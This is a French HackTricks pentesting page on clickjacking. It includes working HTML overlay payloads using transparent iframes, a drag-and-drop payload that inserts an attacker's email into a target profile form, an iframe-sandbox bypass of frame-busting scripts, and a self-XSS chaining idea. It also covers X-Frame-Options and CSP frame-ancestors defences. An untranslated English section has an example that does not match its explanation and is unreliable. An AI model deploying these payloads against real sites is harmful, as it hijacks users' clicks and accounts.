hacktricks/pentesting-web/clickjacking.md

Clickjacking

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
• Découvrez The PEASS Family, notre collection exclusive de NFT
• Obtenez le swag officiel PEASS & HackTricks
• Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
• Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.

Utilisez Trickest pour créer et automatiser des flux de travail avec les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Qu'est-ce que le Clickjacking

Le Clickjacking est une attaque qui trompe un utilisateur en le faisant cliquer sur un élément d'une page web qui est invisible ou déguisé en un autre élément. Cela peut amener les utilisateurs à télécharger involontairement des logiciels malveillants, à visiter des pages web malveillantes, à fournir des informations d'identification ou sensibles, à transférer de l'argent ou à acheter des produits en ligne. (De ici).

Astuce de préremplissage de formulaires

Il est parfois possible de remplir la valeur des champs d'un formulaire en utilisant des paramètres GET lors du chargement d'une page. Un attaquant peut exploiter ce comportement pour remplir un formulaire avec des données arbitraires et envoyer la charge utile de clickjacking afin que l'utilisateur appuie sur le bouton Soumettre.

Remplir un formulaire avec Drag&Drop

Si vous avez besoin que l'utilisateur remplisse un formulaire mais que vous ne voulez pas lui demander directement d'écrire des informations spécifiques (comme l'e-mail et/ou un mot de passe spécifique que vous connaissez), vous pouvez simplement lui demander de faire glisser et déposer quelque chose qui écrira vos données contrôlées comme dans cet exemple.

Charge utile de base

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Charge utile à plusieurs étapes

Clickjacking can be made more effective by using a multistep payload. In this technique, the attacker divides the clickjacking attack into multiple steps, each requiring the victim to perform a specific action.

Le clickjacking peut être rendu plus efficace en utilisant une charge utile à plusieurs étapes. Dans cette technique, l'attaquant divise l'attaque de clickjacking en plusieurs étapes, chacune nécessitant que la victime effectue une action spécifique.

The first step involves tricking the victim into clicking on a transparent or hidden element on the attacker's website. This can be achieved by overlaying the element on top of a legitimate button or link, making it difficult for the victim to notice.

La première étape consiste à tromper la victime en cliquant sur un élément transparent ou caché sur le site web de l'attaquant. Cela peut être réalisé en superposant l'élément sur un bouton ou un lien légitime, rendant difficile pour la victime de le remarquer.

Once the victim clicks on the element, the attacker can then load a new page or perform a specific action on behalf of the victim. This can include submitting a form, making a purchase, or even changing account settings.

Une fois que la victime clique sur l'élément, l'attaquant peut ensuite charger une nouvelle page ou effectuer une action spécifique au nom de la victime. Cela peut inclure la soumission d'un formulaire, l'achat d'un produit ou même la modification des paramètres du compte.

By breaking the clickjacking attack into multiple steps, the attacker can increase the chances of successfully tricking the victim and achieving their malicious goals.

En divisant l'attaque de clickjacking en plusieurs étapes, l'attaquant peut augmenter les chances de tromper avec succès la victime et d'atteindre ses objectifs malveillants.

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Payload Drag&Drop + Clic

Clickjacking is a technique that tricks users into clicking on something different from what they perceive. One way to achieve this is by combining the drag and drop functionality with a click payload.

How it works

1. The attacker creates a malicious webpage that contains an invisible element, such as an iframe, positioned on top of a legitimate button or link.
2. The attacker uses JavaScript to capture the user's click event on the invisible element.
3. When the user clicks on the visible button or link, the click event is actually triggered on the invisible element, executing the attacker's payload.

Example

<!DOCTYPE html>
<html>
  <head>
    <style>
      #invisible {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0;
      }
    </style>
  </head>
  <body>
    <button onclick="alert('Legitimate button clicked!')">Click me</button>
    <iframe id="invisible" src="http://malicious-website.com"></iframe>
  </body>
</html>

In this example, the attacker creates an invisible iframe that covers the entire webpage. When the user clicks on the "Click me" button, the click event is actually triggered on the invisible iframe, executing the payload from the malicious website.

Mitigation

To protect against clickjacking attacks, you can implement the following measures:

• Implement X-Frame-Options header to prevent your website from being loaded within an iframe.
• Use the Content-Security-Policy header to restrict which domains can embed your website.
• Implement frame-busting JavaScript code to prevent your website from being loaded within an iframe.
• Educate users about the risks of clicking on unfamiliar or suspicious links.

By implementing these measures, you can significantly reduce the risk of clickjacking attacks.

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Si vous avez identifié une attaque XSS qui nécessite que l'utilisateur clique sur un élément pour déclencher l'XSS et que la page est vulnérable au clickjacking, vous pouvez l'exploiter pour tromper l'utilisateur en le faisant cliquer sur le bouton/lien.
Exemple:
Vous avez trouvé un self XSS dans certains détails privés du compte (des détails que vous seul pouvez définir et lire). La page avec le formulaire pour définir ces détails est vulnérable au clickjacking et vous pouvez pré-remplir le formulaire avec les paramètres GET.
__Un attaquant pourrait préparer une attaque clickjacking sur cette page en pré-remplissant le formulaire avec la charge utile XSS et en trompant l'utilisateur pour qu'il soumette le formulaire. Ainsi, lorsque le formulaire est soumis et que les valeurs sont modifiées, l'utilisateur exécutera l'XSS.

Comment éviter le Clickjacking

Défenses côté client

Il est possible d'exécuter des scripts côté client qui effectuent certains ou tous les comportements suivants pour prévenir le Clickjacking :

• vérifier et imposer que la fenêtre d'application actuelle est la fenêtre principale ou supérieure,
• rendre tous les frames visibles,
• empêcher de cliquer sur des frames invisibles,
• intercepter et signaler les attaques potentielles de clickjacking à un utilisateur.

Contournement

Comme les bloqueurs de frames sont en JavaScript, les paramètres de sécurité du navigateur peuvent empêcher leur fonctionnement ou même le navigateur peut ne pas prendre en charge JavaScript. Une solution de contournement efficace pour un attaquant contre les bloqueurs de frames est d'utiliser l'attribut sandbox de l'iframe HTML5. Lorsque cela est défini avec les valeurs allow-forms ou allow-scripts et que la valeur allow-top-navigation est omise, le script du bloqueur de frames peut être neutralisé car l'iframe ne peut pas vérifier s'il s'agit ou non de la fenêtre supérieure :

<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>

Les valeurs allow-forms et allow-scripts permettent d'autoriser les actions spécifiées dans l'iframe, mais la navigation de niveau supérieur est désactivée. Cela empêche les comportements de rupture de frame tout en permettant la fonctionnalité sur le site ciblé.

Selon le type d'attaque par détournement de clics, vous devrez peut-être également autoriser allow-same-origin et allow-modals ou même plus. Lors de la préparation de l'attaque, vérifiez simplement la console du navigateur, elle peut vous indiquer les autres comportements que vous devez autoriser.

X-Frame-Options

L'en-tête de réponse HTTP X-Frame-Options peut être utilisé pour indiquer si un navigateur doit être autorisé ou non à afficher une page dans une balise <frame> ou <iframe>. Les sites peuvent l'utiliser pour éviter les attaques par détournement de clics en veillant à ce que leur contenu ne soit pas intégré dans d'autres sites. Définissez l'en-tête X-Frame-Options pour toutes les réponses contenant du contenu HTML. Les valeurs possibles sont :

• X-Frame-Options: deny qui empêche tout domaine d'encadrer le contenu (Valeur recommandée)
• X-Frame-Options: sameorigin qui autorise uniquement le site actuel à encadrer le contenu.
• X-Frame-Options: allow-from https://trusted.com qui autorise le 'uri' spécifié à encadrer cette page.
• Vérifiez les limitations ci-dessous car cela échouera si le navigateur ne le prend pas en charge.
• D'autres navigateurs prennent en charge la nouvelle directive CSP frame-ancestors à la place. Quelques-uns prennent en charge les deux.

Directive frame-ancestors de la politique de sécurité du contenu (CSP)

La protection contre le détournement de clics recommandée consiste à incorporer la directive frame-ancestors dans la politique de sécurité du contenu de l'application.
La directive frame-ancestors 'none' a un comportement similaire à la directive X-Frame-Options deny (Personne ne peut encadrer la page).
La directive frame-ancestors 'self' est largement équivalente à la directive X-Frame-Options sameorigin (seul le site actuel peut l'encadrer).
La directive frame-ancestors trusted.com est largement équivalente à la directive X-Frame-Options allow-from (seul le site de confiance peut l'encadrer).

La CSP suivante autorise uniquement les frames du même domaine :

Content-Security-Policy: frame-ancestors 'self';

Consultez la documentation suivante pour plus de détails et des exemples plus complexes :

• https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors
• https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors

Limitations

• Prise en charge du navigateur : Les directives CSP frame-ancestors ne sont pas encore prises en charge par tous les principaux navigateurs.
• X-Frame-Options a la priorité : La section "Relation avec X-Frame-Options" de la spécification CSP indique : "Si une ressource est fournie avec une politique qui inclut une directive appelée frame-ancestors et dont la disposition est "enforce", alors l'en-tête X-Frame-Options DOIT être ignoré", mais Chrome 40 et Firefox 35 ignorent la directive frame-ancestors et suivent plutôt l'en-tête X-Frame-Options.

Références

• https://portswigger.net/web-security/clickjacking
• https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html

Utilisez Trickest pour créer et automatiser facilement des flux de travail avec les outils communautaires les plus avancés au monde.
Accédez-y dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Vous travaillez dans une entreprise de cybersécurité ? Vous souhaitez voir votre entreprise annoncée dans HackTricks ? ou souhaitez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
• Découvrez The PEASS Family, notre collection exclusive de NFT
• Obtenez le swag officiel PEASS & HackTricks
• Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
• Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.